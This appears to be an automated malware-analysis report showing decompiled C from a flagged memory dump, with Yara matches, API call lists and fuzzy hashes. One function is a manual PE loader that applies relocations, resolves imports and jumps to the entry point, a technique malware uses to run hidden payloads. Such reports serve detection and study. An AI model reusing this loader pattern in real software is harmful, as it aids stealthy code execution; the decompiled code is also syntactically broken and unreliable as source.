                                    				signed int _t253;
                                    				int _t254;
                                    				void* _t257;
                                    				void* _t258;
                                    				int _t259;
                                    				intOrPtr _t260;
                                    				int _t261;
                                    				signed int _t269;
                                    				signed int _t271;
                                    				intOrPtr* _t272;
                                    				void* _t273;
                                    
                                    				_t253 = _a8;
                                    				_t272 = _a4;
                                    				_t3 = _t272 + 0xc; // 0x452bf84d
                                    				_t4 = _t272 + 0x2c; // 0x8df075ff
                                    				_t228 =  *_t4;
                                    				_t137 =  *_t3 + 0xfffffffb;
                                    				_t229 =  <=  ? _t137 : _t228;
                                    				_v16 =  <=  ? _t137 : _t228;
                                    				_t269 = 0;
                                    				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                    				asm("o16 nop [eax+eax]");
                                    				while(1) {
                                    					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                                    					_t141 =  *_t8 + 0x2a >> 3;
                                    					_v12 = 0xffff;
                                    					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                    					if(_t217 < _t141) {
                                    						break;
                                    					}
                                    					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                    					_t12 = _t272 + 0x5c; // 0x84e85000
                                    					_t245 =  *_t11 -  *_t12;
                                    					_v8 = _t245;
                                    					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                    					_t247 =  <  ? _t195 : _v12;
                                    					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                    					if(_t227 >= _v16) {
                                    						L7:
                                    						if(_t253 != 4) {
                                    							L10:
                                    							_t269 = 0;
                                    							__eflags = 0;
                                    						} else {
                                    							_t285 = _t227 - _t195;
                                    							if(_t227 != _t195) {
                                    								goto L10;
                                    							} else {
                                    								_t269 = _t253 - 3;
                                    							}
                                    						}
                                    						E00095D90(_t272, _t272, 0, 0, _t269);
                                    						_t18 = _t272 + 0x14; // 0xc703f045
                                    						_t19 = _t272 + 8; // 0x8d000040
                                    						 *( *_t18 +  *_t19 - 4) = _t227;
                                    						_t22 = _t272 + 0x14; // 0xc703f045
                                    						_t23 = _t272 + 8; // 0x8d000040
                                    						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                    						_t26 = _t272 + 0x14; // 0xc703f045
                                    						_t27 = _t272 + 8; // 0x8d000040
                                    						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                    						_t30 = _t272 + 0x14; // 0xc703f045
                                    						_t31 = _t272 + 8; // 0x8d000040
                                    						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                    						E00094AF0(_t285,  *_t272);
                                    						_t202 = _v8;
                                    						_t273 = _t273 + 0x14;
                                    						if(_t202 != 0) {
                                    							_t208 =  >  ? _t227 : _t202;
                                    							_v8 = _t208;
                                    							_t36 = _t272 + 0x38; // 0xf47d8bff
                                    							_t37 = _t272 + 0x5c; // 0x84e85000
                                    							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                    							_t273 = _t273 + 0xc;
                                    							_t252 = _v8;
                                    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                    							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                    							_t227 = _t227 - _t252;
                                    						}
                                    						if(_t227 != 0) {
                                    							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
                                    							_t273 = _t273 + 0xc;
                                    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                    						}
                                    						_t253 = _a8;
                                    						if(_t269 == 0) {
                                    							continue;
                                    						}
                                    					} else {
                                    						if(_t227 != 0 || _t253 == 4) {
                                    							if(_t253 != 0 && _t227 == _t195) {
                                    								goto L7;
                                    							}
                                    						}
                                    					}
                                    					break;
                                    				}
                                    				_t142 =  *_t272;
                                    				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                    				_a4 = _t232;
                                    				if(_t232 == 0) {
                                    					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                    					_t254 =  *_t83;
                                    				} else {
                                    					_t59 = _t272 + 0x2c; // 0x8df075ff
                                    					_t224 =  *_t59;
                                    					if(_t232 < _t224) {
                                    						_t65 = _t272 + 0x3c; // 0x830cc483
                                    						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                    						_t260 =  *_t66;
                                    						__eflags =  *_t65 - _t260 - _t232;
                                    						if( *_t65 - _t260 <= _t232) {
                                    							_t67 = _t272 + 0x38; // 0xf47d8bff
                                    							_t261 = _t260 - _t224;
                                    							 *(_t272 + 0x6c) = _t261;
                                    							memcpy( *_t67,  *_t67 + _t224, _t261);
                                    							_t70 = _t272 + 0x16b0; // 0xdf750008
                                    							_t188 =  *_t70;
                                    							_t273 = _t273 + 0xc;
                                    							_t232 = _a4;
                                    							__eflags = _t188 - 2;
                                    							if(_t188 < 2) {
                                    								_t189 = _t188 + 1;
                                    								__eflags = _t189;
                                    								 *(_t272 + 0x16b0) = _t189;
                                    							}
                                    						}
                                    						_t73 = _t272 + 0x38; // 0xf47d8bff
                                    						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                    						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                    						_t225 = _a4;
                                    						_t273 = _t273 + 0xc;
                                    						_t76 = _t272 + 0x6c;
                                    						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                    						__eflags =  *_t76;
                                    						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                    						_t184 =  *_t78;
                                    						_t79 = _t272 + 0x2c; // 0x8df075ff
                                    						_t239 =  *_t79;
                                    					} else {
                                    						 *(_t272 + 0x16b0) = 2;
                                    						_t61 = _t272 + 0x38; // 0xf47d8bff
                                    						memcpy( *_t61,  *_t142 - _t224, _t224);
                                    						_t62 = _t272 + 0x2c; // 0x8df075ff
                                    						_t184 =  *_t62;
                                    						_t273 = _t273 + 0xc;
                                    						_t225 = _a4;
                                    						_t239 = _t184;
                                    						 *(_t272 + 0x6c) = _t184;
                                    					}
                                    					_t254 = _t184;
                                    					 *(_t272 + 0x5c) = _t184;
                                    					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                                    					_t185 =  *_t81;
                                    					_t240 = _t239 - _t185;
                                    					_t241 =  <=  ? _t225 : _t240;
                                    					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                    					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                    				}
                                    				if( *(_t272 + 0x16c0) < _t254) {
                                    					 *(_t272 + 0x16c0) = _t254;
                                    				}
                                    				if(_t269 == 0) {
                                    					_t218 = _a8;
                                    					__eflags = _t218;
                                    					if(_t218 == 0) {
                                    						L34:
                                    						_t89 = _t272 + 0x3c; // 0x830cc483
                                    						_t219 =  *_t272;
                                    						_t145 =  *_t89 - _t254 - 1;
                                    						_a4 =  *_t272;
                                    						_t234 = _t254;
                                    						_v16 = _t145;
                                    						_v8 = _t254;
                                    						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                    						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                    							_v8 = _t254;
                                    							_t95 = _t272 + 0x5c; // 0x84e85000
                                    							_a4 = _t219;
                                    							_t234 = _t254;
                                    							_t97 = _t272 + 0x2c; // 0x8df075ff
                                    							__eflags =  *_t95 -  *_t97;
                                    							if( *_t95 >=  *_t97) {
                                    								_t98 = _t272 + 0x2c; // 0x8df075ff
                                    								_t167 =  *_t98;
                                    								_t259 = _t254 - _t167;
                                    								_t99 = _t272 + 0x38; // 0xf47d8bff
                                    								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                    								 *(_t272 + 0x6c) = _t259;
                                    								memcpy( *_t99, _t167 +  *_t99, _t259);
                                    								_t103 = _t272 + 0x16b0; // 0xdf750008
                                    								_t170 =  *_t103;
                                    								_t273 = _t273 + 0xc;
                                    								__eflags = _t170 - 2;
                                    								if(_t170 < 2) {
                                    									_t172 = _t170 + 1;
                                    									__eflags = _t172;
                                    									 *(_t272 + 0x16b0) = _t172;
                                    								}
                                    								_t106 = _t272 + 0x2c; // 0x8df075ff
                                    								_t145 = _v16 +  *_t106;
                                    								__eflags = _t145;
                                    								_a4 =  *_t272;
                                    								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                    								_t234 =  *_t108;
                                    								_v8 = _t234;
                                    							}
                                    						}
                                    						_t255 = _a4;
                                    						_t220 =  *((intOrPtr*)(_a4 + 4));
                                    						__eflags = _t145 - _t220;
                                    						_t221 =  <=  ? _t145 : _t220;
                                    						_t146 = _t221;
                                    						_a4 = _t221;
                                    						_t222 = _a8;
                                    						__eflags = _t146;
                                    						if(_t146 != 0) {
                                    							_t114 = _t272 + 0x38; // 0xf47d8bff
                                    							E00094C30(_t255,  *_t114 + _v8, _t146);
                                    							_t273 = _t273 + 0xc;
                                    							_t117 = _t272 + 0x6c;
                                    							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                    							__eflags =  *_t117;
                                    							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                    							_t234 =  *_t119;
                                    						}
                                    						__eflags =  *(_t272 + 0x16c0) - _t234;
                                    						if( *(_t272 + 0x16c0) < _t234) {
                                    							 *(_t272 + 0x16c0) = _t234;
                                    						}
                                    						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                                    						_t123 = _t272 + 0xc; // 0x452bf84d
                                    						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                    						__eflags = _t257 - 0xffff;
                                    						_t258 =  >  ? 0xffff : _t257;
                                    						_t124 = _t272 + 0x2c; // 0x8df075ff
                                    						_t151 =  *_t124;
                                    						_t125 = _t272 + 0x5c; // 0x84e85000
                                    						_t235 = _t234 -  *_t125;
                                    						__eflags = _t258 - _t151;
                                    						_t152 =  <=  ? _t258 : _t151;
                                    						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                    						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                    							L49:
                                    							__eflags = _t235 - _t258;
                                    							_t154 =  >  ? _t258 : _t235;
                                    							_a4 =  >  ? _t258 : _t235;
                                    							__eflags = _t222 - 4;
                                    							if(_t222 != 4) {
                                    								L53:
                                    								_t269 = 0;
                                    								__eflags = 0;
                                    							} else {
                                    								_t161 =  *_t272;
                                    								__eflags =  *(_t161 + 4);
                                    								_t154 = _a4;
                                    								if( *(_t161 + 4) != 0) {
                                    									goto L53;
                                    								} else {
                                    									__eflags = _t154 - _t235;
                                    									if(_t154 != _t235) {
                                    										goto L53;
                                    									} else {
                                    										_t269 = _t222 - 3;
                                    									}
                                    								}
                                    							}
                                    							_t131 = _t272 + 0x38; // 0xf47d8bff
                                    							_t132 = _t272 + 0x5c; // 0x84e85000
                                    							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                    							_t134 = _t272 + 0x5c;
                                    							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                    							__eflags =  *_t134;
                                    							E00094AF0( *_t134,  *_t272);
                                    						} else {
                                    							__eflags = _t235;
                                    							if(_t235 != 0) {
                                    								L46:
                                    								__eflags = _t222;
                                    								if(_t222 != 0) {
                                    									_t162 =  *_t272;
                                    									__eflags =  *(_t162 + 4);
                                    									if( *(_t162 + 4) == 0) {
                                    										__eflags = _t235 - _t258;
                                    										if(_t235 <= _t258) {
                                    											goto L49;
                                    										}
                                    									}
                                    								}
                                    							} else {
                                    								__eflags = _t222 - 4;
                                    								if(_t222 == 4) {
                                    									goto L46;
                                    								}
                                    							}
                                    						}
                                    						asm("sbb edi, edi");
                                    						_t271 =  ~_t269 & 0x00000002;
                                    						__eflags = _t271;
                                    						return _t271;
                                    					} else {
                                    						__eflags = _t218 - 4;
                                    						if(_t218 == 4) {
                                    							goto L34;
                                    						} else {
                                    							_t173 =  *_t272;
                                    							__eflags =  *(_t173 + 4);
                                    							if( *(_t173 + 4) != 0) {
                                    								goto L34;
                                    							} else {
                                    								_t88 = _t272 + 0x5c; // 0x84e85000
                                    								__eflags = _t254 -  *_t88;
                                    								if(_t254 !=  *_t88) {
                                    									goto L34;
                                    								} else {
                                    									return 1;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					return 3;
                                    				}
                                    			}






















































                                    0x00092f9f

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: memcpy
                                    • String ID:
                                    • API String ID: 3510742995-0
                                    • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                    • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
                                    • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                    • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 52%
                                    			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                    				signed int _v5;
                                    				signed short _v12;
                                    				intOrPtr* _v16;
                                    				signed int* _v20;
                                    				intOrPtr _v24;
                                    				unsigned int _v28;
                                    				signed short* _v32;
                                    				struct HINSTANCE__* _v36;
                                    				intOrPtr* _v40;
                                    				signed short* _v44;
                                    				intOrPtr _v48;
                                    				unsigned int _v52;
                                    				intOrPtr _v56;
                                    				_Unknown_base(*)()* _v60;
                                    				signed int _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				unsigned int _v76;
                                    				intOrPtr _v80;
                                    				signed int _v84;
                                    				intOrPtr _v88;
                                    				signed int _t149;
                                    				void* _t189;
                                    				signed int _t194;
                                    				signed int _t196;
                                    				intOrPtr _t236;
                                    
                                    				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                    				_v24 = _v72;
                                    				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                                    				_v56 = _t236;
                                    				if(_t236 == 0) {
                                    					L13:
                                    					while(0 != 0) {
                                    					}
                                    					_push(8);
                                    					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                                    						L35:
                                    						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                                    						while(0 != 0) {
                                    						}
                                    						if(_a12 != 0) {
                                    							 *_a12 = _v68;
                                    						}
                                    						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                                    						return _v68(_a4, 1, _a8);
                                    					}
                                    					_v84 = 0x80000000;
                                    					_t149 = 8;
                                    					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                                    					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                    						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                    						if(_v36 == 0) {
                                    							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                    						}
                                    						if(_v36 != 0) {
                                    							if( *_v16 == 0) {
                                    								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                    							} else {
                                    								_v20 =  *_v16 + _a4;
                                    							}
                                    							_v64 = _v64 & 0x00000000;
                                    							while( *_v20 != 0) {
                                    								if(( *_v20 & _v84) == 0) {
                                    									_v88 =  *_v20 + _a4;
                                    									_v60 = GetProcAddress(_v36, _v88 + 2);
                                    								} else {
                                    									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                                    								}
                                    								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                    									 *_v20 = _v60;
                                    								} else {
                                    									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                                    								}
                                    								_v20 =  &(_v20[1]);
                                    								_v64 = _v64 + 4;
                                    							}
                                    							_v16 = _v16 + 0x14;
                                    							continue;
                                    						} else {
                                    							_t189 = 0xfffffffd;
                                    							return _t189;
                                    						}
                                    					}
                                    					goto L35;
                                    				}
                                    				_t194 = 8;
                                    				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                                    				_t196 = 8;
                                    				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                                    				while(0 != 0) {
                                    				}
                                    				while(_v48 > 0) {
                                    					_v28 = _v44[2];
                                    					_v48 = _v48 - _v28;
                                    					_v28 = _v28 - 8;
                                    					_v28 = _v28 >> 1;
                                    					_v32 =  &(_v44[4]);
                                    					_v80 = _a4 +  *_v44;
                                    					_v52 = _v28;
                                    					while(1) {
                                    						_v76 = _v52;
                                    						_v52 = _v52 - 1;
                                    						if(_v76 == 0) {
                                    							break;
                                    						}
                                    						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                    						_v12 =  *_v32 & 0xfff;
                                    						_v40 = (_v12 & 0x0000ffff) + _v80;
                                    						if((_v5 & 0x000000ff) != 3) {
                                    							if((_v5 & 0x000000ff) == 0xa) {
                                    								 *_v40 =  *_v40 + _v56;
                                    							}
                                    						} else {
                                    							 *_v40 =  *_v40 + _v56;
                                    						}
                                    						_v32 =  &(_v32[1]);
                                    					}
                                    					_v44 = _v32;
                                    				}
                                    				goto L13;
                                    			}






























                                    APIs
                                    • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
                                    • LoadLibraryA.KERNEL32(?), ref: 00092C65
                                    • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleLibraryLoadModule
                                    • String ID:
                                    • API String ID: 384173800-0
                                    • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                                    • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
                                    • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                                    • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
                                    				char _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				char _v28;
                                    				void* _t13;
                                    				intOrPtr _t15;
                                    				signed int _t16;
                                    				intOrPtr _t17;
                                    				signed int _t18;
                                    				char _t20;
                                    				intOrPtr _t22;
                                    				void* _t23;
                                    				void* _t24;
                                    				intOrPtr _t29;
                                    				intOrPtr _t35;
                                    				intOrPtr _t41;
                                    				intOrPtr _t43;
                                    				intOrPtr _t48;
                                    				void* _t51;
                                    				signed int _t61;
                                    				signed int _t64;
                                    				void* _t71;
                                    
                                    				_t71 = __fp0;
                                    				_t61 = __ecx;
                                    				_t41 =  *0x9e6dc; // 0x1e4
                                    				_t13 = E0008A4BF(_t41, 0);
                                    				while(_t13 < 0) {
                                    					E0008980C( &_v28);
                                    					_t43 =  *0x9e6e0; // 0x0
                                    					_t15 =  *0x9e6e4; // 0x0
                                    					_t41 = _t43 + 0xe10;
                                    					asm("adc eax, ebx");
                                    					__eflags = _t15 - _v24;
                                    					if(__eflags > 0) {
                                    						L9:
                                    						_t16 = 0xfffffffe;
                                    						L13:
                                    						return _t16;
                                    					}
                                    					if(__eflags < 0) {
                                    						L4:
                                    						_t17 =  *0x9e684; // 0x12af8f0
                                    						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
                                    						__eflags = _t18;
                                    						if(_t18 == 0) {
                                    							break;
                                    						}
                                    						_t35 =  *0x9e684; // 0x12af8f0
                                    						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                                    						_t41 =  *0x9e6dc; // 0x1e4
                                    						__eflags = 0;
                                    						_t13 = E0008A4BF(_t41, 0);
                                    						continue;
                                    					}
                                    					__eflags = _t41 - _v28;
                                    					if(_t41 >= _v28) {
                                    						goto L9;
                                    					}
                                    					goto L4;
                                    				}
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t20 =  *0x9e6e8; // 0x12afdb8
                                    				_v28 = _t20;
                                    				_t22 = E0008A6A9(_t41, _t61,  &_v16);
                                    				_v20 = _t22;
                                    				if(_t22 != 0) {
                                    					_t23 = GetCurrentProcess();
                                    					_t24 = GetCurrentThread();
                                    					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
                                    					E0008980C(0x9e6e0);
                                    					_t64 = E00081A1B( &_v28, E00081226, _t71);
                                    					__eflags = _t64;
                                    					if(_t64 >= 0) {
                                    						_push(0);
                                    						_push( *0x9e760);
                                    						_t51 = 0x27;
                                    						E00089F06(_t51);
                                    					}
                                    				} else {
                                    					_t64 = _t61 | 0xffffffff;
                                    				}
                                    				_t29 =  *0x9e684; // 0x12af8f0
                                    				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
                                    				_t48 =  *0x9e6dc; // 0x1e4
                                    				 *0x9e6d0 = 0;
                                    				E0008A4DB(_t48);
                                    				E0008861A( &_v24, 0);
                                    				_t16 = _t64;
                                    				goto L13;
                                    			}


























                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1e5d1b1923da54aa82617f9d89ec702fdab843db12d3064c823b188d08538140
                                    • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
                                    • Opcode Fuzzy Hash: 1e5d1b1923da54aa82617f9d89ec702fdab843db12d3064c823b188d08538140
                                    • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E00081B2D(void* __eflags, void* __fp0) {
                                    				char _v24;
                                    				char _v28;
                                    				void* _t12;
                                    				intOrPtr _t14;
                                    				void* _t15;
                                    				intOrPtr _t16;
                                    				void* _t17;
                                    				void* _t19;
                                    				void* _t20;
                                    				char _t24;
                                    				intOrPtr _t26;
                                    				intOrPtr _t28;
                                    				intOrPtr _t33;
                                    				intOrPtr _t38;
                                    				intOrPtr _t40;
                                    				void* _t41;
                                    				intOrPtr _t46;
                                    				void* _t48;
                                    				intOrPtr _t51;
                                    				void* _t61;
                                    				void* _t71;
                                    
                                    				_t71 = __fp0;
                                    				_t38 =  *0x9e6f4; // 0x1e0
                                    				_t12 = E0008A4BF(_t38, 0);
                                    				while(_t12 < 0) {
                                    					E0008980C( &_v28);
                                    					_t40 =  *0x9e700; // 0x0
                                    					_t14 =  *0x9e704; // 0x0
                                    					_t41 = _t40 + 0x3840;
                                    					asm("adc eax, ebx");
                                    					__eflags = _t14 - _v24;
                                    					if(__eflags > 0) {
                                    						L13:
                                    						_t15 = 0;
                                    					} else {
                                    						if(__eflags < 0) {
                                    							L4:
                                    							_t16 =  *0x9e684; // 0x12af8f0
                                    							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
                                    							__eflags = _t17;
                                    							if(_t17 == 0) {
                                    								break;
                                    							} else {
                                    								_t33 =  *0x9e684; // 0x12af8f0
                                    								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                                    								_t51 =  *0x9e6f4; // 0x1e0
                                    								__eflags = 0;
                                    								_t12 = E0008A4BF(_t51, 0);
                                    								continue;
                                    							}
                                    						} else {
                                    							__eflags = _t41 - _v28;
                                    							if(_t41 >= _v28) {
                                    								goto L13;
                                    							} else {
                                    								goto L4;
                                    							}
                                    						}
                                    					}
                                    					L12:
                                    					return _t15;
                                    				}
                                    				E0008980C(0x9e700);
                                    				_t19 = GetCurrentProcess();
                                    				_t20 = GetCurrentThread();
                                    				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t24 =  *0x9e6e8; // 0x12afdb8
                                    				_v28 = _t24;
                                    				_t61 = E00081A1B( &_v28, E0008131E, _t71);
                                    				if(_t61 >= 0) {
                                    					_push(0);
                                    					_push( *0x9e760);
                                    					_t48 = 0x27;
                                    					E00089F06(_t48);
                                    				}
                                    				if(_v24 != 0) {
                                    					E00086890( &_v24);
                                    				}
                                    				_t26 =  *0x9e684; // 0x12af8f0
                                    				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
                                    				_t28 =  *0x9e758; // 0x0
                                    				 *0x9e6ec = 0;
                                    				_t29 =  !=  ? 1 : _t28;
                                    				_t46 =  *0x9e6f4; // 0x1e0
                                    				 *0x9e758 =  !=  ? 1 : _t28;
                                    				E0008A4DB(_t46);
                                    				_t15 = _t61;
                                    				goto L12;
                                    			}

























                                    APIs
                                    • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
                                    • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
                                    • DuplicateHandle.KERNEL32 ref: 00081BD9
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Current$Process$DuplicateHandleThread
                                    • String ID:
                                    • API String ID: 3566409357-0
                                    • Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                                    • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
                                    • Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                                    • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%